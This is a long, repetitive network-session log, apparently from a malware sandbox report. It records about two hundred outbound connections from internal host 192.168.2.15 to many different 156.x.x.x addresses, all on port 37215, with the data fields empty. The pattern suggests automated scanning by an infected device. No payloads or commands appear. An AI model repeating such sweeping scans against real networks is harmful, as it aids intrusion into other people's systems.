                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12128192.168.2.1554568156.151.212.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12129192.168.2.1553848156.82.108.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12130192.168.2.1541222156.16.87.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12131192.168.2.1546554156.94.190.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12132192.168.2.1538392156.143.136.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12133192.168.2.1545892156.103.234.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12134192.168.2.1553248156.147.136.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12135192.168.2.1541408156.77.54.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12136192.168.2.1548554156.37.5.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12137192.168.2.1550638156.212.207.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12138192.168.2.1537732156.221.254.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12139192.168.2.1544632156.125.30.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12140192.168.2.1541738156.124.128.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12141192.168.2.1556796156.61.77.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12142192.168.2.1560712156.219.241.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12143192.168.2.1550058156.108.118.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12144192.168.2.1552600156.81.237.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12145192.168.2.1542428156.211.4.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12146192.168.2.1537612156.13.199.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12147192.168.2.1536146156.225.115.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12148192.168.2.1545544156.215.69.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12149192.168.2.1533726156.225.43.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12150192.168.2.1544394156.225.228.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12151192.168.2.1545518156.208.15.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12152192.168.2.1551252156.63.118.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12153192.168.2.1559050156.241.161.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12154192.168.2.1551772156.20.132.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12155192.168.2.1560422156.69.67.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12156192.168.2.1547348156.6.81.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12157192.168.2.1558586156.179.234.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12158192.168.2.1542704156.217.42.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12159192.168.2.1534962156.87.42.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12160192.168.2.1533298156.214.131.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12161192.168.2.1556586156.12.87.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12162192.168.2.1536340156.245.48.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12163192.168.2.1551360156.249.160.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12164192.168.2.1556658156.237.14.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12165192.168.2.1546204156.175.254.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12166192.168.2.1549400156.254.29.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12167192.168.2.1552260156.108.21.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12168192.168.2.1560070156.35.202.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12169192.168.2.1555854156.71.170.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12170192.168.2.1553814156.54.126.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12171192.168.2.1560392156.228.143.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12172192.168.2.1543934156.3.206.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12173192.168.2.1534518156.151.30.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12174192.168.2.1560224156.125.143.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12175192.168.2.1538192156.251.40.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12176192.168.2.1553930156.173.183.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12177192.168.2.1546272156.184.18.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12178192.168.2.1542310156.55.1.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12179192.168.2.1547396156.68.170.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12180192.168.2.1542574156.221.64.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12181192.168.2.1543412156.191.152.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12182192.168.2.1534588156.131.45.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12183192.168.2.1550430156.102.91.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12184192.168.2.1560916156.191.41.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12185192.168.2.1551514156.170.140.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12186192.168.2.1540554156.249.94.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12187192.168.2.1536234156.128.15.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12188192.168.2.1551698156.41.125.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12189192.168.2.1537584156.7.13.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12190192.168.2.1535994156.252.17.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12191192.168.2.1549232156.192.195.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12192192.168.2.1560496156.108.134.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12193192.168.2.1552088156.7.227.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12194192.168.2.1547016156.148.191.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12195192.168.2.1549834156.30.231.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12196192.168.2.1547108156.118.56.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12197192.168.2.1559238156.109.234.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12198192.168.2.1537942156.169.43.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12199192.168.2.1554880156.160.208.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12200192.168.2.1542752156.31.104.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12201192.168.2.1557748156.93.108.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12202192.168.2.1551574156.243.185.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12203192.168.2.1547828156.88.83.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12204192.168.2.1540388156.243.24.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12205192.168.2.1538814156.102.179.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12206192.168.2.1552012156.190.130.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12207192.168.2.1540122156.110.180.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12208192.168.2.1545778156.50.148.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12209192.168.2.1556902156.65.121.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12210192.168.2.1552868156.29.211.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12211192.168.2.1555042156.176.2.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12212192.168.2.1543454156.201.158.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12213192.168.2.1537040156.103.5.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12214192.168.2.1545940156.2.88.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12215192.168.2.1544374156.55.14.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12216192.168.2.1546862156.77.188.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12217192.168.2.1547136156.202.111.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12218192.168.2.1540916156.51.54.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12219192.168.2.1539336156.5.228.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12220192.168.2.1533512156.181.16.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12221192.168.2.1535384156.50.165.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12222192.168.2.1553550156.249.117.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12223192.168.2.1537036156.153.60.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12224192.168.2.1560614156.154.114.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12225192.168.2.1534298156.121.111.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12226192.168.2.1557918156.237.80.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12227192.168.2.1533712156.100.184.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12228192.168.2.1542278156.151.37.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12229192.168.2.1535034156.194.104.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12230192.168.2.1550636156.184.85.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12231192.168.2.1534074156.125.134.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12232192.168.2.1550826156.233.195.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12233192.168.2.1535868156.168.193.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12234192.168.2.1544642156.12.87.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12235192.168.2.1556110156.178.214.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12236192.168.2.1557178156.158.163.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12237192.168.2.1546608156.190.116.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12238192.168.2.1551284156.154.102.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12239192.168.2.1536722156.58.176.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12240192.168.2.1534956156.156.147.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12241192.168.2.1547450156.32.185.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12242192.168.2.1554024156.243.16.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12243192.168.2.1556942156.165.109.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12244192.168.2.1541128156.23.188.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12245192.168.2.1541036156.251.85.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12246192.168.2.1538592156.178.166.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12247192.168.2.1553442156.48.40.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12248192.168.2.1538356156.16.180.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12249192.168.2.1549496156.104.60.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12250192.168.2.1559188156.151.79.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12251192.168.2.1555824156.208.220.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12252192.168.2.1534224156.116.90.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12253192.168.2.1556366156.243.249.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12254192.168.2.1535660156.55.132.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12255192.168.2.1543670156.67.124.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12256192.168.2.1559146156.163.242.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12257192.168.2.1545080156.159.164.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12258192.168.2.1540744156.234.19.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12259192.168.2.1558546156.132.103.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12260192.168.2.1533154156.31.18.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12261192.168.2.1548578156.214.62.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12262192.168.2.1534242156.23.128.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12263192.168.2.1546244156.25.105.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12264192.168.2.1547048156.84.98.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12265192.168.2.1543798156.167.62.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12266192.168.2.1538452156.88.64.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12267192.168.2.1549262156.56.166.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12268192.168.2.1550246156.216.118.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12269192.168.2.1554220156.75.115.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12270192.168.2.1554796156.222.212.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12271192.168.2.1539388156.70.205.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12272192.168.2.1535332156.222.6.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12273192.168.2.1539270156.111.68.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12274192.168.2.1535696156.241.136.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12275192.168.2.1537062156.202.24.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12276192.168.2.1544592156.186.110.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12277192.168.2.1536346156.117.197.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12278192.168.2.1542798156.52.242.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12279192.168.2.1550514156.255.60.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12280192.168.2.1533490156.229.239.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12281192.168.2.1549068156.171.62.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12282192.168.2.1537752156.174.143.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12283192.168.2.1543330156.112.20.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12284192.168.2.1533498156.30.3.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12285192.168.2.1548646156.125.168.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12286192.168.2.1560322156.30.98.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12287192.168.2.1559162156.38.37.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12288192.168.2.1559240156.76.235.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12289192.168.2.1545282156.229.165.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12290192.168.2.1536166156.229.215.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12291192.168.2.1535484156.50.192.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12292192.168.2.1547852156.197.226.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12293192.168.2.1534912156.96.228.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12294192.168.2.1552612156.105.245.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12295192.168.2.1550358156.5.58.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12296192.168.2.1554082156.74.241.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12297192.168.2.1537010156.17.169.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12298192.168.2.1545398156.168.165.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12299192.168.2.1549866156.185.51.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12300192.168.2.1554696156.175.52.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12301192.168.2.1547742156.163.209.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12302192.168.2.1553772156.94.110.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12303192.168.2.1557606156.125.221.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12304192.168.2.1536824156.45.97.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12305192.168.2.1536954156.124.31.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12306192.168.2.1542800156.195.233.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12307192.168.2.1559044156.88.98.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12308192.168.2.1539906156.171.44.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12309192.168.2.1558768156.170.67.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12310192.168.2.1546440156.178.140.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12311192.168.2.1546996156.32.221.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12312192.168.2.1556890156.95.206.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12313192.168.2.1559674156.118.164.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12314192.168.2.1542536156.5.205.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12315192.168.2.1541996156.178.62.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12316192.168.2.1540762156.13.130.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12317192.168.2.1549832156.174.156.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12318192.168.2.1542062156.55.197.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12319192.168.2.1548780156.3.59.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12320192.168.2.1548474156.245.148.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12321192.168.2.1536250156.111.115.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12322192.168.2.1537010156.242.211.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12323192.168.2.1552412156.222.34.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12324192.168.2.1538898156.75.34.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12325192.168.2.1537104156.39.245.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12326192.168.2.1552140156.156.74.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12327192.168.2.1544522156.232.203.22037215
                                                                            TimestampBytes transferredDirectionData


